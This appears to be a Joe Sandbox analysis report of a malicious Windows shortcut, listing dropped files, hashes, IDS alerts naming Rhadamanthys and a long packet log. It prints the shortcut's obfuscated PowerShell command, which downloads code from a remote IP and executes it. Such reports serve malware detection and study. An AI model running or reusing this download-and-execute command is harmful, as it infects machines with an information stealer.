                                                                                                                                                      Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\123123213123123321132.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):979567349
                                                                                                                                                      Entropy (8bit):0.044015443076063046
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:
                                                                                                                                                      MD5:F3A1A808509BADBC5640180DDA688EE0
                                                                                                                                                      SHA1:3B967CE059B17F9F2A5E1416188A910797240E16
                                                                                                                                                      SHA-256:6F2EB3AE312F322B8AAFC8EEFF1E402325D6E18A7D37DDA3A0FAD727845D19C8
                                                                                                                                                      SHA-512:D3957CDE1EAA284FA14F207041739F372FD4C7A587FC70EA136BA53A83102849DEFBAC9F09C314643ACF3165A0144F97CB60F64DCCFE27F0766AE903002B5421
                                                                                                                                                      Malicious:true
                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                      • Filename: 098aPtSbmd.bat, Detection: malicious, Browse
                                                                                                                                                      • Filename: loader.ps1.bat, Detection: malicious, Browse
                                                                                                                                                      • Filename: readme.exe, Detection: malicious, Browse
                                                                                                                                                      • Filename: Documenti relativi alla violazione dei diritti di propriet#U00e0 intellettuale.lnk, Detection: malicious, Browse
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................z..............z........#.............................Rich..................PE..L......C.....................`....................@...........................6.....Y.$..............................................."..............................................................................................................text............................... ..`.rdata...|..........................@..@.data....)...P.......P..............@....rsrc........."......0..............@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):55
                                                                                                                                                      Entropy (8bit):4.306461250274409
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1835008
                                                                                                                                                      Entropy (8bit):4.466406437004551
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:IIXfpi67eLPU9skLmb0b4zWSPKaJG8nAgejZMMhA2gX4WABl0uNCdwBCswSbt:dXD94zWlLZMM6YFHY+t
                                                                                                                                                      MD5:BB06726EE034F2AC6DBCC3A3A572E119
                                                                                                                                                      SHA1:8DCA3DFE85A0B04D31320E0AFE49BD3082F974BF
                                                                                                                                                      SHA-256:334B498D8546DD476D6BE3CB256B5FE3231D479BA587267A51EEA1C535396BC8
                                                                                                                                                      SHA-512:98ABCBBCB063257F32E09F5052DE3E039F754E3BC457FF12C34DD8328F27F39C3C2605B366F492210F3882F2E33FCDF9F03F52DF30AA61224F65C7C16F74CEFA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...GLF..............................................................................................................................................................................................................................................................................................................................................t5.s........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Working directory, Has command line arguments, Icon number=1, Archive, ctime=Thu Nov 28 22:32:21 2024, mtime=Sun Dec 1 16:36:54 2024, atime=Thu Nov 28 22:32:21 2024, length=289792, window=hide
                                                                                                                                                      Entropy (8bit):4.604822446011418
                                                                                                                                                      TrID:
                                                                                                                                                      • Windows Shortcut (20020/1) 100.00%
                                                                                                                                                      File name:Readme.lnk.download.lnk
                                                                                                                                                      File size:1'558 bytes
                                                                                                                                                      MD5:417b5899a759a9291c1d2ae8e3e98032
                                                                                                                                                      SHA1:eedc1bba983c8928e8f55ba85acdce50b4305503
                                                                                                                                                      SHA256:46d1b27aa5c040327d90c5d9044fceef8825572906065a97d61def0cd3b49a8b
                                                                                                                                                      SHA512:c966bc2869c86b4c11ed4ce011360753ffabfcd3c1919dc25c7229d93d46dff50a3f3f35f886b5622bc1e8c45611fe560e1bc96a4f8dc7fc0f477c563022cf26
                                                                                                                                                      SSDEEP:48:8GnIWax4PsUn8AImzjzrk5nIRMXv3SsgoQYk:8nWaxEs9AIOzO2qvZg5Y
                                                                                                                                                      TLSH:5831B1252EC55735D1B38A3B8AF7F242CF25BA526C234FAE4150524D0891605FC75B3E
                                                                                                                                                      File Content Preview:L..................F.... ....Q...A.......D.......A...l......................5....P.O. .:i.....+00.../C:\...................V.1......Y'...Windows.@........OwH.Y(...........................-...W.i.n.d.o.w.s.....Z.1......Y)...System32..B........OwH.YI.......
                                                                                                                                                      Icon Hash:6de5a7b7b3b3a185

                                                                                                                                                      General

                                                                                                                                                      Relative Path:
                                                                                                                                                      Command Line Argument:/c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03)
                                                                                                                                                      Icon location:%SystemRoot%\System32\SHELL32.dll
                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                      2024-12-04T13:58:11.179835+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44973295.169.201.10018960TCP
                                                                                                                                                      2024-12-04T13:58:49.517769+01002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert1104.37.175.2327716192.168.2.449785TCP
                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Dec 4, 2024 13:58:00.618426085 CET4973018956192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:00.738913059 CET189564973095.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:00.739017010 CET4973018956192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:00.742913961 CET4973018956192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:00.863179922 CET189564973095.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:02.026686907 CET49675443192.168.2.4173.222.162.32
                                                                                                                                                      Dec 4, 2024 13:58:02.798145056 CET189564973095.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:02.809657097 CET189564973095.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:02.809714079 CET4973018956192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:02.809920073 CET189564973095.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:02.809962988 CET4973018956192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:03.005389929 CET4973018956192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:03.031364918 CET4973118960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:03.125371933 CET189564973095.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:03.151465893 CET189604973195.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:03.151551962 CET4973118960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:03.151905060 CET4973118960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:03.271635056 CET189604973195.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:04.423015118 CET189604973195.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:04.464226007 CET4973118960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:04.702261925 CET4973118960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:06.129096031 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:06.250626087 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:06.250704050 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:06.260673046 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:06.380541086 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.517987967 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.518053055 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.518065929 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.518157005 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:07.518455029 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.518465042 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.518471003 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.518518925 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.518553972 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:07.519320011 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.519331932 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.519341946 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.519432068 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:07.519432068 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:07.638590097 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.638608932 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.639478922 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:07.642266989 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.682935953 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:07.710915089 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.710933924 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.711003065 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:07.714337111 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.714545012 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.714590073 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:07.722927094 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.723102093 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.723227978 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:07.731410980 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.731532097 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.731574059 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:07.739901066 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.739990950 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.740036011 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:07.748405933 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.748517036 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.748567104 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:07.756999016 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.757121086 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.757160902 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:07.765466928 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.765604973 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.766063929 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:07.773894072 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.774082899 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.774125099 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:07.782499075 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.782519102 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.782573938 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:07.802867889 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.803145885 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.803205967 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:07.807060957 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.847271919 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:07.902324915 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.902344942 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.902390957 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:07.903713942 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.903939009 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.903978109 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:07.909250975 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.909349918 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.909468889 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:07.912673950 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.912811041 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.912928104 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:07.917529106 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.917676926 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.917721033 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:07.922408104 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.922602892 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.922641993 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:07.927156925 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.927270889 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.927309036 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:07.931961060 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.932061911 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.932118893 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:07.936990023 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.937094927 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.937131882 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:07.941601038 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.941790104 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.941972017 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:07.946474075 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.946552038 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.946676970 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:07.951247931 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.951364994 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.951406002 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:07.955998898 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.956108093 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.956183910 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:07.960838079 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.960926056 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.961029053 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:07.965667009 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.965805054 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.965845108 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:07.970500946 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.970786095 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.970820904 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:07.975290060 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.975413084 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.975481987 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:07.980072975 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.980180025 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.980220079 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:07.984905958 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.985035896 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.985080004 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:07.989803076 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.989927053 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.989963055 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:07.994492054 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.994704962 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:07.994760036 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:07.999309063 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.042304039 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.094450951 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.094468117 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.094532013 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.096031904 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.096791029 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.096844912 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.096898079 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.100351095 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.100446939 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.100502014 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.103173971 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.103353977 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.103399992 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.106487036 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.106573105 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.106618881 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.109925032 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.109992027 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.110024929 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.113291025 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.113348007 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.113374949 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.116580963 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.116677999 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.116729975 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.119790077 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.119828939 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.119890928 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.122981071 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.123126030 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.123173952 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.126070976 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.126250029 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.126305103 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.129226923 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.129368067 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.129422903 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.132327080 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.132388115 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.132442951 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.135543108 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.135639906 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.135680914 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.138663054 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.138737917 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.138777971 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.141675949 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.141798019 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.141843081 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.144797087 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.144893885 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.144937992 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.147973061 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.148082018 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.148133039 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.151108027 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.151156902 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.151324987 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.154225111 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.154336929 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.154386044 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.157418013 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.157435894 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.157484055 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.160413027 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.160527945 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.160571098 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.163583994 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.163698912 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.163743973 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.166646004 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.166784048 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.166831970 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.169806957 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.169893026 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.169940948 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.172926903 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.173032999 CET189604973295.169.201.100192.168.2.4
